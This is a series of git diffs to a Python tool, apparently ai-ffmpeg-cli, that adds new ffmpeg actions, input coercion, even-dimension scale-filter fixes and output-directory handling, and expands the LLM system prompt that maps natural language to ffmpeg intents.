||||
|
||||
Args:
|
||||
value: Seconds as number or string
|
||||
|
||||
Returns:
|
||||
Timestamp string in HH:MM:SS[.ms] format
|
||||
"""
|
||||
try:
|
||||
seconds_float = float(value)
|
||||
except Exception:
|
||||
@@ -26,6 +43,8 @@ def _seconds_to_timestamp(value: float | int | str) -> str:
|
||||
|
||||
|
||||
class Action(str, Enum):
|
||||
"""Supported ffmpeg actions for intent processing."""
|
||||
|
||||
convert = "convert"
|
||||
extract_audio = "extract_audio"
|
||||
remove_audio = "remove_audio"
|
||||
@@ -33,11 +52,19 @@ class Action(str, Enum):
|
||||
segment = "segment"
|
||||
thumbnail = "thumbnail"
|
||||
frames = "frames"
|
||||
extract_frames = "extract_frames"
|
||||
compress = "compress"
|
||||
overlay = "overlay"
|
||||
format_convert = "format_convert"
|
||||
|
||||
|
||||
class FfmpegIntent(BaseModel):
|
||||
"""Represents a parsed ffmpeg intent with all parameters.
|
||||
|
||||
This model captures the user's intent for ffmpeg operations,
|
||||
including action type, input/output files, and processing parameters.
|
||||
"""
|
||||
|
||||
action: Action
|
||||
inputs: list[Path] = Field(default_factory=list)
|
||||
output: Path | None = None
|
||||
@@ -55,23 +82,42 @@ class FfmpegIntent(BaseModel):
|
||||
fps: str | None = None
|
||||
glob: str | None = None
|
||||
extra_flags: list[str] = Field(default_factory=list)
|
||||
quality: str | None = None # For quality settings
|
||||
format: str | None = None # For format conversion
|
||||
|
||||
@model_validator(mode="before")
|
||||
@classmethod
|
||||
def _coerce_lists(cls, values: object) -> object:
|
||||
"""Pre-validate and coerce input values to proper types.
|
||||
|
||||
Handles type conversion for lists and timestamp formatting
|
||||
before model validation.
|
||||
|
||||
Args:
|
||||
values: Raw input values
|
||||
|
||||
Returns:
|
||||
Processed values with proper types
|
||||
"""
|
||||
if not isinstance(values, dict):
|
||||
return values
|
||||
# inputs: allow scalar -> [scalar]
|
||||
# inputs: allow scalar -> [scalar] or None -> []
|
||||
inputs = values.get("inputs")
|
||||
if inputs is not None and not isinstance(inputs, list):
|
||||
if inputs is None:
|
||||
values["inputs"] = []
|
||||
elif not isinstance(inputs, list):
|
||||
values["inputs"] = [inputs]
|
||||
# filters: allow scalar -> [str(scalar)]
|
||||
# filters: allow scalar -> [str(scalar)] or None -> []
|
||||
filters = values.get("filters")
|
||||
if filters is not None and not isinstance(filters, list):
|
||||
if filters is None:
|
||||
values["filters"] = []
|
||||
elif not isinstance(filters, list):
|
||||
values["filters"] = [str(filters)]
|
||||
# extra_flags: allow scalar -> [str(scalar)]
|
||||
# extra_flags: allow scalar -> [str(scalar)] or None -> []
|
||||
extra_flags = values.get("extra_flags")
|
||||
if extra_flags is not None and not isinstance(extra_flags, list):
|
||||
if extra_flags is None:
|
||||
values["extra_flags"] = []
|
||||
elif not isinstance(extra_flags, list):
|
||||
values["extra_flags"] = [str(extra_flags)]
|
||||
|
||||
# start/end: allow numeric seconds -> HH:MM:SS[.ms]
|
||||
@@ -79,10 +125,30 @@ class FfmpegIntent(BaseModel):
|
||||
values["start"] = _seconds_to_timestamp(values["start"])
|
||||
if "end" in values and not isinstance(values.get("end"), str):
|
||||
values["end"] = _seconds_to_timestamp(values["end"])
|
||||
|
||||
# fps: allow numeric values -> string
|
||||
if "fps" in values and not isinstance(values.get("fps"), str):
|
||||
values["fps"] = str(values["fps"])
|
||||
|
||||
# glob: allow any value -> string or None
|
||||
if "glob" in values and values.get("glob") is not None:
|
||||
values["glob"] = str(values["glob"])
|
||||
|
||||
return values
|
||||
|
||||
@model_validator(mode="after")
|
||||
def _validate(self) -> FfmpegIntent:
|
||||
"""Post-validate the intent for logical consistency.
|
||||
|
||||
Ensures that required fields are present for each action type
|
||||
and that incompatible combinations are caught.
|
||||
|
||||
Returns:
|
||||
Self if validation passes
|
||||
|
||||
Raises:
|
||||
ValueError: When validation fails
|
||||
"""
|
||||
if self.action == Action.overlay and not self.overlay_path:
|
||||
raise ValueError("overlay requires overlay_path")
|
||||
|
||||
@@ -91,12 +157,22 @@ class FfmpegIntent(BaseModel):
|
||||
):
|
||||
raise ValueError("trim/segment requires start+end or duration")
|
||||
|
||||
if self.action in {Action.convert, Action.compress} and not self.inputs:
|
||||
raise ValueError("convert/compress requires at least one input")
|
||||
if (
|
||||
self.action in {Action.convert, Action.compress, Action.format_convert}
|
||||
and not self.inputs
|
||||
):
|
||||
raise ValueError("convert/compress/format_convert requires at least one input")
|
||||
|
||||
if self.action == Action.extract_audio and not self.inputs:
|
||||
raise ValueError("extract_audio requires an input file")
|
||||
|
||||
# Add validation for new actions
|
||||
if self.action == Action.extract_frames and not self.fps:
|
||||
raise ValueError("extract_frames requires fps parameter")
|
||||
|
||||
if self.action == Action.format_convert and not self.format:
|
||||
raise ValueError("format_convert requires format parameter")
|
||||
|
||||
# Ensure incompatible combos are caught
|
||||
if self.action == Action.thumbnail and self.fps:
|
||||
raise ValueError("thumbnail is incompatible with fps; use frames action")
|
||||
@@ -105,6 +181,12 @@ class FfmpegIntent(BaseModel):
|
||||
|
||||
|
||||
class CommandEntry(BaseModel):
|
||||
"""Represents a single ffmpeg command with its parameters.
|
||||
|
||||
Contains all information needed to execute a single ffmpeg command,
|
||||
including input/output files and command arguments.
|
||||
"""
|
||||
|
||||
input: Path
|
||||
output: Path
|
||||
args: list[str] = Field(default_factory=list)
|
||||
@@ -112,5 +194,11 @@ class CommandEntry(BaseModel):
|
||||
|
||||
|
||||
class CommandPlan(BaseModel):
|
||||
"""Represents a complete plan of ffmpeg commands to execute.
|
||||
|
||||
Contains a human-readable summary and a list of command entries
|
||||
that will be executed in sequence.
|
||||
"""
|
||||
|
||||
summary: str
|
||||
entries: list[CommandEntry]
|
||||
@@ -1,4 +1,4 @@
|
||||
"""Natural language schema definitions for ai-ffmpeg-cli.
|
||||
"""Extended natural language schema definitions for ai-ffmpeg-cli.
|
||||
|
||||
This module defines the core data structures used for parsing and representing
|
||||
user intents in natural language form. It provides Pydantic models for type
|
||||
@@ -155,6 +155,15 @@ class FfmpegIntent(BaseModel):
|
||||
values["start"] = _seconds_to_timestamp(values["start"])
|
||||
if "end" in values and not isinstance(values.get("end"), str):
|
||||
values["end"] = _seconds_to_timestamp(values["end"])
|
||||
|
||||
# fps: allow numeric values -> string
|
||||
if "fps" in values and not isinstance(values.get("fps"), str):
|
||||
values["fps"] = str(values["fps"])
|
||||
|
||||
# glob: allow any value -> string or None
|
||||
if "glob" in values and values.get("glob") is not None:
|
||||
values["glob"] = str(values["glob"])
|
||||
|
||||
return values
|
||||
|
||||
@model_validator(mode="after")
|
||||
@@ -182,9 +191,7 @@ class FfmpegIntent(BaseModel):
|
||||
self.action in {Action.convert, Action.compress, Action.format_convert}
|
||||
and not self.inputs
|
||||
):
|
||||
raise ValueError(
|
||||
"convert/compress/format_convert requires at least one input"
|
||||
)
|
||||
raise ValueError("convert/compress/format_convert requires at least one input")
|
||||
|
||||
if self.action == Action.extract_audio and not self.inputs:
|
||||
raise ValueError("extract_audio requires an input file")
|
||||
@@ -1,42 +1,187 @@
|
||||
"""Intent routing and command plan generation for ai-ffmpeg-cli.
|
||||
|
||||
This module handles the conversion of parsed ffmpeg intents into executable
|
||||
command plans, including security validation and filter optimization.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
from pathlib import Path
|
||||
|
||||
from .errors import BuildError
|
||||
from .io_utils import expand_globs
|
||||
from .nl_schema import Action
|
||||
from .nl_schema import CommandEntry
|
||||
from .nl_schema import CommandPlan
|
||||
from .nl_schema import FfmpegIntent
|
||||
from .custom_exceptions import BuildError
|
||||
from .file_operations import expand_globs
|
||||
from .intent_models import Action
|
||||
from .intent_models import CommandEntry
|
||||
from .intent_models import CommandPlan
|
||||
from .intent_models import FfmpegIntent
|
||||
|
||||
|
||||
def _derive_output_name(input_path: Path, intent: FfmpegIntent) -> Path:
|
||||
if intent.output:
|
||||
return intent.output
|
||||
stem = input_path.stem
|
||||
suffix = input_path.suffix
|
||||
if intent.action == Action.extract_audio:
|
||||
return input_path.with_suffix(".mp3")
|
||||
if intent.action == Action.thumbnail:
|
||||
return input_path.with_name("thumbnail.png")
|
||||
if intent.action == Action.frames:
|
||||
return input_path.with_name(f"{stem}_frame_%04d.png")
|
||||
if intent.action == Action.trim:
|
||||
return input_path.with_name("clip.mp4")
|
||||
if intent.action == Action.remove_audio:
|
||||
return input_path.with_name(f"{stem}_mute.mp4")
|
||||
if intent.action == Action.overlay:
|
||||
return input_path.with_name(f"{stem}_overlay.mp4")
|
||||
if intent.action in {Action.convert, Action.compress}:
|
||||
return input_path.with_suffix(".mp4")
|
||||
return input_path.with_suffix(suffix)
|
||||
def _validate_and_fix_scale_filter(scale_filter: str | None) -> str | None:
|
||||
"""Validate and fix scale filter to ensure even dimensions for H.264/H.265 compatibility.
|
||||
|
||||
|
||||
def route_intent(intent: FfmpegIntent, allowed_dirs: list[Path] | None = None) -> CommandPlan:
|
||||
"""Route FfmpegIntent to CommandPlan with security validation.
|
||||
H.264 and H.265 codecs require even dimensions for proper encoding.
|
||||
This function ensures scale filters produce even width and height values.
|
||||
|
||||
Args:
|
||||
intent: Parsed user intent
|
||||
scale_filter: The scale filter string (e.g., "scale=iw*9/16:ih")
|
||||
|
||||
Returns:
|
||||
Fixed scale filter that ensures even dimensions, or original if no fixes needed
|
||||
"""
|
||||
if not scale_filter or not scale_filter.startswith("scale="):
|
||||
return scale_filter
|
||||
|
||||
# Extract the scale parameters (remove "scale=" prefix)
|
||||
scale_params = scale_filter[6:]
|
||||
|
||||
# Check if it's a simple width:height format
|
||||
if ":" in scale_params and not any(op in scale_params for op in ["*", "/", "+", "-"]):
|
||||
# Simple format like "1280:720" - ensure even numbers
|
||||
parts = scale_params.split(":")
|
||||
if len(parts) >= 2:
|
||||
try:
|
||||
width = int(parts[0])
|
||||
height = int(parts[1])
|
||||
# Make sure both dimensions are even for codec compatibility
|
||||
if width % 2 != 0:
|
||||
width -= 1
|
||||
if height % 2 != 0:
|
||||
height -= 1
|
||||
# Reconstruct the scale filter with additional parameters if any
|
||||
result = f"scale={width}:{height}"
|
||||
if len(parts) > 2:
|
||||
result += ":" + ":".join(parts[2:])
|
||||
# Add force_original_aspect_ratio=decrease if not already present
|
||||
if "force_original_aspect_ratio" not in result:
|
||||
result += ":force_original_aspect_ratio=decrease"
|
||||
return result
|
||||
except ValueError:
|
||||
# If parsing fails, return original filter
|
||||
pass
|
||||
|
||||
# For aspect ratio changes that might result in odd dimensions,
|
||||
# use a more robust approach that ensures even dimensions
|
||||
if "9/16" in scale_params or "16/9" in scale_params:
|
||||
# For 9:16 aspect ratio conversions, use a safer approach
|
||||
if "ih*9/16:ih" in scale_params:
|
||||
# Instead of calculating width from height, calculate height from width
|
||||
# This is more likely to result in even dimensions
|
||||
return "scale=iw:iw*16/9:force_original_aspect_ratio=decrease"
|
||||
elif "iw*16/9:iw" in scale_params:
|
||||
# For 16:9 aspect ratio
|
||||
return "scale=iw:iw*9/16:force_original_aspect_ratio=decrease"
|
||||
|
||||
# For other complex expressions, add force_original_aspect_ratio=decrease to help FFmpeg
|
||||
# handle dimension calculations more safely, but only if not already present
|
||||
if "force_original_aspect_ratio" not in scale_params:
|
||||
return f"scale={scale_params}:force_original_aspect_ratio=decrease"
|
||||
|
||||
return scale_filter
|
||||
|
||||
|
||||
def _validate_and_fix_filter_chain(filter_chain: list[str]) -> list[str]:
|
||||
"""Validate and fix a chain of filters, ensuring proper handling of scale filters.
|
||||
|
||||
Applies validation specifically to scale filters while preserving
|
||||
other filters without modification.
|
||||
|
||||
Args:
|
||||
filter_chain: List of filter strings to validate
|
||||
|
||||
Returns:
|
||||
Fixed filter chain with validated scale filters
|
||||
"""
|
||||
validated_filters = []
|
||||
|
||||
for filter_item in filter_chain:
|
||||
if filter_item.startswith("scale="):
|
||||
# Apply scale filter validation for even dimensions
|
||||
fixed_filter = _validate_and_fix_scale_filter(filter_item)
|
||||
if fixed_filter:
|
||||
validated_filters.append(fixed_filter)
|
||||
else:
|
||||
# For non-scale filters, don't add force_original_aspect_ratio=decrease
|
||||
# as it's not supported by most filters
|
||||
validated_filters.append(filter_item)
|
||||
|
||||
return validated_filters
|
||||
|
||||
|
||||
def _derive_output_name(
|
||||
input_path: Path, intent: FfmpegIntent, output_dir: Path | None = None
|
||||
) -> Path:
|
||||
"""Derive output filename based on intent and input file.
|
||||
|
||||
Generates appropriate output filenames based on the action type,
|
||||
ensuring descriptive names that avoid overwriting input files.
|
||||
|
||||
Args:
|
||||
input_path: Input file path
|
||||
intent: Parsed ffmpeg intent
|
||||
output_dir: Output directory path (optional, defaults to input directory)
|
||||
|
||||
Returns:
|
||||
Output file path with appropriate name and extension
|
||||
"""
|
||||
if intent.output and intent.output != input_path:
|
||||
# If output is specified, use it but potentially move to output directory
|
||||
if output_dir:
|
||||
return output_dir / intent.output.name
|
||||
return intent.output
|
||||
|
||||
stem = input_path.stem
|
||||
suffix = input_path.suffix
|
||||
|
||||
# Determine output directory
|
||||
target_dir = output_dir if output_dir else input_path.parent
|
||||
|
||||
# Generate action-specific output names
|
||||
if intent.action == Action.extract_audio:
|
||||
return target_dir / f"{stem}.mp3"
|
||||
if intent.action == Action.thumbnail:
|
||||
return target_dir / "thumbnail.png"
|
||||
if intent.action == Action.frames:
|
||||
return target_dir / f"{stem}_frame_%04d.png"
|
||||
if intent.action == Action.extract_frames:
|
||||
return target_dir / f"{stem}_frames_%04d.png"
|
||||
if intent.action == Action.trim:
|
||||
return target_dir / "clip.mp4"
|
||||
if intent.action == Action.remove_audio:
|
||||
return target_dir / f"{stem}_mute.mp4"
|
||||
if intent.action == Action.overlay:
|
||||
return target_dir / f"{stem}_overlay.mp4"
|
||||
if intent.action in {Action.convert, Action.compress}:
|
||||
# Generate a descriptive output name to avoid overwriting input
|
||||
return target_dir / f"{stem}_converted.mp4"
|
||||
if intent.action == Action.format_convert:
|
||||
# Use the format from the intent to determine the extension
|
||||
if intent.format:
|
||||
# Map common formats to extensions
|
||||
format_extensions = {
|
||||
"webm": ".webm",
|
||||
"avi": ".avi",
|
||||
"mkv": ".mkv",
|
||||
"mov": ".mov",
|
||||
"mp4": ".mp4",
|
||||
}
|
||||
extension = format_extensions.get(intent.format, f".{intent.format}")
|
||||
return target_dir / f"{stem}{extension}"
|
||||
return target_dir / f"{stem}{suffix}"
|
||||
return target_dir / f"{stem}{suffix}"
|
||||
|
||||
|
||||
def route_intent(
|
||||
intent: FfmpegIntent, allowed_dirs: list[Path] | None = None, output_dir: Path | None = None
|
||||
) -> CommandPlan:
|
||||
"""Route FfmpegIntent to CommandPlan with security validation.
|
||||
|
||||
Converts a parsed intent into an executable command plan, including
|
||||
security validation, glob expansion, and command argument generation.
|
||||
|
||||
Args:
|
||||
intent: Parsed user intent to route
|
||||
allowed_dirs: List of allowed directories for file operations
|
||||
output_dir: Output directory for generated files (optional)
|
||||
|
||||
Returns:
|
||||
CommandPlan: Execution plan with validated commands
|
||||
@@ -54,7 +199,7 @@ def route_intent(intent: FfmpegIntent, allowed_dirs: list[Path] | None = None) -
|
||||
derived_inputs.extend(globbed)
|
||||
|
||||
# Validate all input paths for security
|
||||
from .io_utils import is_safe_path
|
||||
from .file_operations import is_safe_path
|
||||
|
||||
validated_inputs = []
|
||||
for input_path in derived_inputs:
|
||||
@@ -81,17 +226,54 @@ def route_intent(intent: FfmpegIntent, allowed_dirs: list[Path] | None = None) -
|
||||
entries: list[CommandEntry] = []
|
||||
|
||||
for inp in derived_inputs:
|
||||
output = _derive_output_name(inp, intent)
|
||||
output = _derive_output_name(inp, intent, output_dir)
|
||||
args: list[str] = []
|
||||
|
||||
if intent.action == Action.convert:
|
||||
# Collect all filters to combine into a single -vf flag
|
||||
all_filters = []
|
||||
|
||||
if intent.scale:
|
||||
args.extend(["-vf", f"scale={intent.scale}"])
|
||||
# Validate and fix scale filter to ensure even dimensions
|
||||
fixed_scale = _validate_and_fix_scale_filter(f"scale={intent.scale}")
|
||||
if fixed_scale:
|
||||
all_filters.append(fixed_scale)
|
||||
|
||||
if intent.filters:
|
||||
# Validate all filters in the filters list
|
||||
validated_filters = _validate_and_fix_filter_chain(intent.filters)
|
||||
all_filters.extend(validated_filters)
|
||||
|
||||
# Remove duplicate scale filters (keep the last one)
|
||||
scale_filters = [f for f in all_filters if f.startswith("scale=")]
|
||||
non_scale_filters = [f for f in all_filters if not f.startswith("scale=")]
|
||||
|
||||
# If there are multiple scale filters, keep only the last one
|
||||
if len(scale_filters) > 1:
|
||||
scale_filters = [scale_filters[-1]]
|
||||
|
||||
# Reconstruct the filter chain
|
||||
final_filters = non_scale_filters + scale_filters
|
||||
|
||||
# Add single -vf flag with all filters combined
|
||||
if final_filters:
|
||||
filter_str = ",".join(final_filters)
|
||||
args.extend(["-vf", filter_str])
|
||||
|
||||
if intent.video_codec:
|
||||
args.extend(["-c:v", intent.video_codec])
|
||||
if intent.audio_codec:
|
||||
args.extend(["-c:a", intent.audio_codec])
|
||||
elif intent.action == Action.extract_audio:
|
||||
# Extract audio with high quality settings
|
||||
args.extend(["-q:a", "0", "-map", "a"])
|
||||
elif intent.action == Action.remove_audio:
|
||||
# Remove audio track
|
||||
args.extend(["-an"])
|
||||
if intent.video_codec:
|
||||
args.extend(["-c:v", intent.video_codec])
|
||||
elif intent.action == Action.trim:
|
||||
# Handle trimming with start/end/duration
|
||||
if intent.start:
|
||||
args.extend(["-ss", intent.start])
|
||||
# If end is provided, prefer -to; otherwise use duration if present
|
||||
@@ -100,7 +282,7 @@ def route_intent(intent: FfmpegIntent, allowed_dirs: list[Path] | None = None) -
|
||||
elif intent.duration is not None:
|
||||
args.extend(["-t", str(intent.duration)])
|
||||
elif intent.action == Action.segment:
|
||||
# simplified: use start/end if provided, else duration
|
||||
# Simplified segmenting: use start/end if provided, else duration
|
||||
if intent.start:
|
||||
args.extend(["-ss", intent.start])
|
||||
if intent.end:
|
||||
@@ -108,18 +290,24 @@ def route_intent(intent: FfmpegIntent, allowed_dirs: list[Path] | None = None) -
|
||||
elif intent.duration is not None:
|
||||
args.extend(["-t", str(intent.duration)])
|
||||
elif intent.action == Action.thumbnail:
|
||||
# Extract single frame for thumbnail
|
||||
if intent.start:
|
||||
args.extend(["-ss", intent.start])
|
||||
args.extend(["-vframes", "1"])
|
||||
elif intent.action == Action.frames:
|
||||
# Extract frames with specified FPS
|
||||
if intent.fps:
|
||||
args.extend(["-vf", f"fps={intent.fps}"])
|
||||
elif intent.action == Action.compress:
|
||||
# defaults in command builder
|
||||
# Apply compression settings with defaults
|
||||
if intent.crf is not None:
|
||||
args.extend(["-crf", str(intent.crf)])
|
||||
if intent.video_codec:
|
||||
args.extend(["-c:v", intent.video_codec])
|
||||
if intent.audio_codec:
|
||||
args.extend(["-c:a", intent.audio_codec])
|
||||
elif intent.action == Action.overlay:
|
||||
# include overlay input and optional xy; filter added in builder if not present
|
||||
# Handle overlay operations with additional input
|
||||
if intent.overlay_path:
|
||||
# When overlay_xy provided, include filter here to override builder default
|
||||
if intent.overlay_xy:
|
||||
@@ -133,11 +321,28 @@ def route_intent(intent: FfmpegIntent, allowed_dirs: list[Path] | None = None) -
|
||||
)
|
||||
)
|
||||
continue
|
||||
elif intent.action == Action.format_convert:
|
||||
# Handle format conversion with specific codecs
|
||||
if intent.format:
|
||||
args.extend(["-f", intent.format])
|
||||
if intent.video_codec:
|
||||
args.extend(["-c:v", intent.video_codec])
|
||||
if intent.audio_codec:
|
||||
args.extend(["-c:a", intent.audio_codec])
|
||||
elif intent.action == Action.extract_frames:
|
||||
# Handle frame extraction with FPS
|
||||
if intent.fps:
|
||||
args.extend(["-vf", f"fps={intent.fps}"])
|
||||
else:
|
||||
# Default to 1 frame per 5 seconds
|
||||
args.extend(["-vf", "fps=1/5"])
|
||||
# Add frame_pts for better frame naming
|
||||
args.extend(["-frame_pts", "1"])
|
||||
else:
|
||||
raise BuildError(
|
||||
f"Unsupported action: {intent.action}. "
|
||||
f"Supported actions are: convert, extract_audio, remove_audio, "
|
||||
f"trim, segment, thumbnail, frames, compress, overlay. "
|
||||
f"trim, segment, thumbnail, frames, compress, overlay, format_convert, extract_frames. "
|
||||
f"Please rephrase your request using supported operations."
|
||||
)
|
||||
|
||||
@@ -148,6 +353,18 @@ def route_intent(intent: FfmpegIntent, allowed_dirs: list[Path] | None = None) -
|
||||
|
||||
|
||||
def _build_summary(intent: FfmpegIntent, entries: list[CommandEntry]) -> str:
|
||||
"""Build a human-readable summary of the command plan.
|
||||
|
||||
Creates a descriptive summary of what the command plan will do,
|
||||
including action type, file count, and key parameters.
|
||||
|
||||
Args:
|
||||
intent: The parsed intent
|
||||
entries: List of command entries in the plan
|
||||
|
||||
Returns:
|
||||
Human-readable summary string
|
||||
"""
|
||||
if intent.action == Action.convert:
|
||||
return f"Convert {len(entries)} file(s) to mp4 h264+aac with optional scale {intent.scale or '-'}"
|
||||
if intent.action == Action.extract_audio:
|
||||
@@ -165,4 +382,12 @@ def _build_summary(intent: FfmpegIntent, entries: list[CommandEntry]) -> str:
|
||||
return f"Compress {len(entries)} file(s) with libx265 CRF {intent.crf or 28}"
|
||||
if intent.action == Action.frames:
|
||||
return f"Extract frames from {len(entries)} file(s) with fps {intent.fps or '1/5'}"
|
||||
if intent.action == Action.format_convert:
|
||||
format_info = f"format={intent.format}" if intent.format else "default format"
|
||||
video_info = f"video={intent.video_codec}" if intent.video_codec else "default video"
|
||||
audio_info = f"audio={intent.audio_codec}" if intent.audio_codec else "default audio"
|
||||
return f"Convert {len(entries)} file(s) to {format_info} with {video_info} and {audio_info}"
|
||||
if intent.action == Action.extract_frames:
|
||||
fps_info = f"fps={intent.fps}" if intent.fps else "fps=1/5"
|
||||
return f"Extract frames from {len(entries)} file(s) with {fps_info}"
|
||||
return f"Action {intent.action} on {len(entries)} file(s)"
|
||||
|
||||
@@ -1,3 +1,9 @@
|
||||
"""LLM client implementation for ai-ffmpeg-cli.
|
||||
|
||||
This module provides the interface for communicating with Large Language Models
|
||||
to parse natural language prompts into structured ffmpeg intents.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
@@ -5,31 +11,160 @@ from typing import Any
|
||||
|
||||
from pydantic import ValidationError
|
||||
|
||||
from .errors import ParseError
|
||||
from .nl_schema import FfmpegIntent
|
||||
from .security import create_secure_logger
|
||||
from .security import sanitize_error_message
|
||||
from .credential_security import create_secure_logger
|
||||
from .credential_security import sanitize_error_message
|
||||
from .custom_exceptions import ParseError
|
||||
from .intent_models import FfmpegIntent
|
||||
|
||||
# Create secure logger that masks sensitive information
|
||||
logger = create_secure_logger(__name__)
|
||||
|
||||
|
||||
# Comprehensive system prompt that instructs the LLM on how to parse natural language
|
||||
# into structured ffmpeg intents with specific schema requirements
|
||||
SYSTEM_PROMPT = (
|
||||
"You are an expert assistant that translates natural language into ffmpeg intents. "
|
||||
"Respond ONLY with JSON matching the FfmpegIntent schema. Fields: action, inputs, output, "
|
||||
"video_codec, audio_codec, filters, start, end, duration, scale, bitrate, crf, overlay_path, "
|
||||
"overlay_xy, fps, glob, extra_flags. Use defaults: convert uses libx264+aac; 720p->scale=1280:720, "
|
||||
"1080p->1920:1080; compression uses libx265 with crf=28. If unsupported, reply with "
|
||||
'{"error": "unsupported_action", "message": "..."}.'
|
||||
"You are an expert assistant that translates natural language into ffmpeg intents.\n"
|
||||
"Respond ONLY with JSON matching the FfmpegIntent schema.\n"
|
||||
"\n"
|
||||
"Schema fields (all optional unless noted):\n"
|
||||
" action (required): one of ['convert','trim','segment','overlay','thumbnail','extract_audio','compress','format_convert','extract_frames']\n"
|
||||
" inputs: array of absolute file paths from context.videos / context.audios / context.images\n"
|
||||
" output: null or string filename (must NOT equal any input path)\n"
|
||||
" video_codec: e.g. 'libx264','libx265','copy'\n"
|
||||
" audio_codec: e.g. 'aac','libopus','copy','none'\n"
|
||||
" filters: ffmpeg filter chain string, filters separated by commas\n"
|
||||
" start: start time (e.g. '00:00:05.000' or seconds number)\n"
|
||||
" end: end time (same format as start). If both start and duration present, ignore end.\n"
|
||||
" duration: seconds number or time string\n"
|
||||
" scale: WxH string (e.g. '1920:1080'). Used ONLY if caller intends a simple scale; otherwise prefer 'filters'.\n"
|
||||
" bitrate: target video bitrate like '4000k' (ignored if crf is set)\n"
|
||||
" crf: integer CRF value (0=lossless, 18-28 common). Prefer CRF when present.\n"
|
||||
" overlay_path: absolute image/video path (from context) for overlays if action requires\n"
|
||||
" overlay_xy: overlay position like 'x=10:y=20'\n"
|
||||
" fps: integer frames per second (e.g. 30)\n"
|
||||
" glob: boolean; when true, inputs may include a single shell-style glob from context.images\n"
|
||||
" extra_flags: array of additional ffmpeg CLI flags (strings)\n"
|
||||
"\n"
|
||||
"Context usage:\n"
|
||||
" • Use ONLY paths present in context.videos, context.audios, or context.images.\n"
|
||||
" • Never invent filenames. Never use placeholders like 'input.mp4'.\n"
|
||||
" • If the user mentions a file that is not in context, return an error JSON (see Errors).\n"
|
||||
"\n"
|
||||
"Defaults and best practices:\n"
|
||||
" • For 'convert' without explicit codecs: video_codec='libx264', audio_codec='aac'.\n"
|
||||
" • For 'compress': video_codec='libx265', crf=28, audio_codec='aac'.\n"
|
||||
" • For format conversion (e.g., to GIF, WebM, AVI): use 'convert' action with appropriate filters and codecs.\n"
|
||||
" - GIF: use 'convert' with filters='fps=10,scale=320:-1:flags=lanczos,split[s0][s1];[s0]palettegen[p];[s1][p]paletteuse'\n"
|
||||
" - WebM: use 'convert' with video_codec='libvpx-vp9', audio_codec='libopus'\n"
|
||||
" - AVI: use 'convert' with video_codec='libx264', audio_codec='mp3'\n"
|
||||
" • Use 'format_convert' only when the user explicitly asks for a specific container format with default codecs.\n"
|
||||
" • Always ensure even dimensions with H.264/H.265. Use scale expressions that guarantee even sizes,\n"
|
||||
" e.g. scale=trunc(iw*0.5/2)*2:trunc(ih*0.5/2)*2 or force_original_aspect_ratio=decrease followed by pad with even ow/oh.\n"
|
||||
" • Prefer CRF over bitrate unless user explicitly asks for a bitrate.\n"
|
||||
" • Add 'yuv420p' pixel format and '+faststart' for web/social compatibility:\n"
|
||||
" extra_flags should include ['-pix_fmt','yuv420p','-movflags','+faststart'] unless user forbids.\n"
|
||||
" • If audio is not mentioned and exists, transcode to AAC at a reasonable default (e.g. 128k); if user says 'no audio', set audio_codec='none'.\n"
|
||||
" • If fps is requested, include -r via fps field (integer).\n"
|
||||
" • If duration is requested (e.g., '5 second GIF'), use duration field (number or time string).\n"
|
||||
"\n"
|
||||
"Aspect ratio & resizing rules:\n"
|
||||
" • For target AR changes (e.g. Instagram Reels 9:16, 1080x1920):\n"
|
||||
" - If user says 'crop' or 'fill', use: scale=-2:1920:force_original_aspect_ratio=increase, then crop=1080:1920 centered.\n"
|
||||
" - If user says 'pad' or 'no crop', use: scale=1080:-2:force_original_aspect_ratio=decrease, then pad=1080:1920:(ow-iw)/2:(oh-ih)/2.\n"
|
||||
" - Ensure final width/height are even.\n"
|
||||
" • If user gives only AR (e.g. 'make 9:16') and no resolution, infer 1080x1920 for vertical or 1920x1080 for horizontal.\n"
|
||||
"\n"
|
||||
"Subtitles (burn-in):\n"
|
||||
" • Use the 'subtitles=' filter when the user requests visible/burned captions.\n"
|
||||
" • Styling (ASS force_style) goes inside the subtitles filter only. Example:\n"
|
||||
" subtitles=/abs/path.srt:force_style='Fontsize=36,Outline=2,Shadow=1,PrimaryColour=&HFFFFFF&,OutlineColour=&H000000&'\n"
|
||||
" • Combine filters with commas, e.g.: scale=1080:-2:force_original_aspect_ratio=decrease,pad=1080:1920:(ow-iw)/2:(oh-ih)/2,subtitles=/abs/path.srt\n"
|
||||
"\n"
|
||||
"Filter chain rules:\n"
|
||||
" • Filters must be comma-separated in a single chain string.\n"
|
||||
" • Options like force_original_aspect_ratio apply ONLY to the scale filter, not to crop/subtitles.\n"
|
||||
" • Do NOT place unrelated options after subtitles. Each filter has its own parameters.\n"
|
||||
"\n"
|
||||
"Output safety:\n"
|
||||
" • Never set output to any input path. If omitted, the system will auto-name.\n"
|
||||
" • If user requests a container that conflicts with codecs (e.g. .mp4 with vp9), keep the container as requested but select compatible defaults if unspecified.\n"
|
||||
"\n"
|
||||
"Multiple inputs:\n"
|
||||
" • For concat of files with identical codecs, set action='concat' and provide inputs; filters may be empty. Otherwise use concat demuxing guidance implied by the user request.\n"
|
||||
"\n"
|
||||
"Trimming:\n"
|
||||
" • Respect start/end/duration. If both end and duration are given, prefer duration.\n"
|
||||
" • When user specifies a time limit (e.g., '5 second', '10s', '30 seconds'), use the duration field.\n"
|
||||
" • Duration can be specified as a number (seconds) or time string (e.g., '00:00:05').\n"
|
||||
" • IMPORTANT: When user asks for a specific duration (e.g., '5 second GIF', '10 second video'),\n"
|
||||
" ALWAYS include the duration field in the response.\n"
|
||||
"\n"
|
||||
"Errors:\n"
|
||||
" • If the user asks for an action you cannot express, reply ONLY with:\n"
|
||||
' {"error":"unsupported_action","message":"<short reason>"}\n'
|
||||
" • If required files are not in context, reply ONLY with:\n"
|
||||
' {"error":"missing_input","message":"File not found in context: <name>"}\n'
|
||||
"\n"
|
||||
"Quoting & portability:\n"
|
||||
" • Do not include shell quoting (no surrounding quotes). Provide plain values; the caller will add shell quotes.\n"
|
||||
" • Use absolute paths exactly as given in context.\n"
|
||||
"\n"
|
||||
"Examples (illustrative only — always use real context paths):\n"
|
||||
" • Instagram Reel (crop/fill): action='convert', filters='scale=-2:1920:force_original_aspect_ratio=increase,crop=1080:1920'\n"
|
||||
" • Instagram Reel (pad): action='convert', filters='scale=1080:-2:force_original_aspect_ratio=decrease,pad=1080:1920:(ow-iw)/2:(oh-ih)/2'\n"
|
||||
